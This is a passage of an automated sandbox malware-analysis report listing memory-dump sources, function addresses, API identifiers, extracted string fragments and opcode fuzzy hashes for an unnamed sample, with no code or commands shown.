                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: 727d646bb8f6485df970165c831b4b7f332d2d589a5a7d56ca0ccd77d55332b1
                                        • Instruction ID: b47309e1ce8bf0067f2aa14d387b45de781309b32b844ddbe7f4672f5857139b
                                        • Opcode Fuzzy Hash: 727d646bb8f6485df970165c831b4b7f332d2d589a5a7d56ca0ccd77d55332b1
                                        • Instruction Fuzzy Hash: 0C11B7B8A00209EFCB04DFA4D989AAEB7B5FF89300F104559ED15A7350D770AE55CF61
                                        Function 00C0B8CA Relevance: 4.2, Strings: 2, Instructions: 1670COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: &o_${yw
                                        • API String ID: 0-1902345325
                                        • Opcode ID: 5825c811a45e57d9fad567597f2d11f0e26e37ce73547fd2686aa1bad2dbbca4
                                        • Instruction ID: e12c2ef46776eaf2a599912fb2374c272f37f4f941617fd3df24180fca2f0176
                                        • Opcode Fuzzy Hash: 5825c811a45e57d9fad567597f2d11f0e26e37ce73547fd2686aa1bad2dbbca4
                                        • Instruction Fuzzy Hash: FAB215F360C2049FE3046E2DEC8567ABBE9EF94320F1A493DE6C4C7744EA3598458697
                                        Function 00BFAD0E Relevance: 4.0, Strings: 2, Instructions: 1513COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: FTm$rw9
                                        • API String ID: 0-1961150735
                                        • Opcode ID: e070bc6790d91ec180bf7d65a12d57064f4196a808196e61f293f2840db52ba4
                                        • Instruction ID: e52308613e41ae41e9edcc5c7381412f903a32992e498deb0314201b8e76b014
                                        • Opcode Fuzzy Hash: e070bc6790d91ec180bf7d65a12d57064f4196a808196e61f293f2840db52ba4
                                        • Instruction Fuzzy Hash: 01A2F6F360C2049FE304AE2DEC8567AF7E9EF94720F16892DE6C5C3744EA3598058697
                                        Function 00824BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?$__ZN
                                        • API String ID: 0-1427190319
                                        • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction ID: 82d6be1d4ad21bc74eeca5ab87f150eb8ba61ce24b8cbed50cdcb6cbbefc456a
                                        • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction Fuzzy Hash: 0E7234B2908B609FD714CF18D89066AB7E2FFD5320F598A1DF895DB291D370DC818B92
                                        Function 00805DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: xn--
                                        • API String ID: 0-2826155999
                                        • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction ID: 8b1c706770a3d8ab27156296e4970aebffe90778204becdc45c4011feaa955d4
                                        • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction Fuzzy Hash: 67A203B2D002688AEF68CB58CC503EDB7B1FF55300F1842AAD456BB2C1E7355EA5CB51
                                        Function 00804DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction ID: 0d5cd2c1548b0eca6edf63e48bc75c72d074b246dbb7f5feed1f262d52c98425
                                        • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction Fuzzy Hash: 43E1FE316087459FC764DE28C8807AFB7E2FF8A300F454A2DE5D9DB291DB319845CB92
                                        Function 00804868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction ID: 2b42d6b8d52a77e0ad5688277f81b8b301f25048885dd1f80e2aa96d72401ac2
                                        • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction Fuzzy Hash: 3CE1E1B1A483148FCB64DE18CC917AEB7E2FFC4310F55892DEA89DB290D730AC458B46
                                        Function 0081E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: UNC\
                                        • API String ID: 0-505053535
                                        • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction ID: a65211c4afe3314edb5dd63f49b1a4ceed4a7043ece7eb5462db633b9df3fab2
                                        • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction Fuzzy Hash: F8E16C71D046698EEB208F18C8847FEBBE6FF95318F598169D8A4DB291C3358DC5CB90
                                        Function 00B75D2A Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: [pzW
                                        • API String ID: 0-1231448772
                                        • Opcode ID: d9c238503026032242a12ecb54e293aed4587de2c919eb5b194f3920a2088cd4
                                        • Instruction ID: 9a57293f5f7bd397bdda8552cee6d3b5c1428e3fc74e64f5a85797efcd62b19b
                                        • Opcode Fuzzy Hash: d9c238503026032242a12ecb54e293aed4587de2c919eb5b194f3920a2088cd4
                                        • Instruction Fuzzy Hash: 828138F3A086004FF3045E39DD9976AB7D5EBD4720F2B463DE9C997784E9399C014682
                                        Function 00B68ED9 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2G~
                                        • API String ID: 0-3026970577
                                        • Opcode ID: 6a915781ac7b94009c41bfc941b616572d3b03263186c88ffaf9a50a5c3adbfa
                                        • Instruction ID: ff0e1ac1589dcf956099e45dcfc1c01c732a5be8a20be66d0017634ff3ed2d8b
                                        • Opcode Fuzzy Hash: 6a915781ac7b94009c41bfc941b616572d3b03263186c88ffaf9a50a5c3adbfa
                                        • Instruction Fuzzy Hash: 514128F3A092005BF308992DDC4573AB6EAEFD4720F2AC63DE688877C4E97D5C024256
                                        Function 00B1BD15 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: y5{'
                                        • API String ID: 0-2081554983
                                        • Opcode ID: fdd9e6264fcd338520ecd823943a9be9b565fa615d574fae673de80b26f32939
                                        • Instruction ID: 612b88012a67a722af23881069e8d8b881bae1c8a64ebf07f6f600ef1949c100
                                        • Opcode Fuzzy Hash: fdd9e6264fcd338520ecd823943a9be9b565fa615d574fae673de80b26f32939
                                        • Instruction Fuzzy Hash: 7341D1B3A093248FE340AE68DC4577BBBE5EF94351F16493DEAC4C7784EA3598408786
                                        Function 007DE544 Relevance: .8, Instructions: 823COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
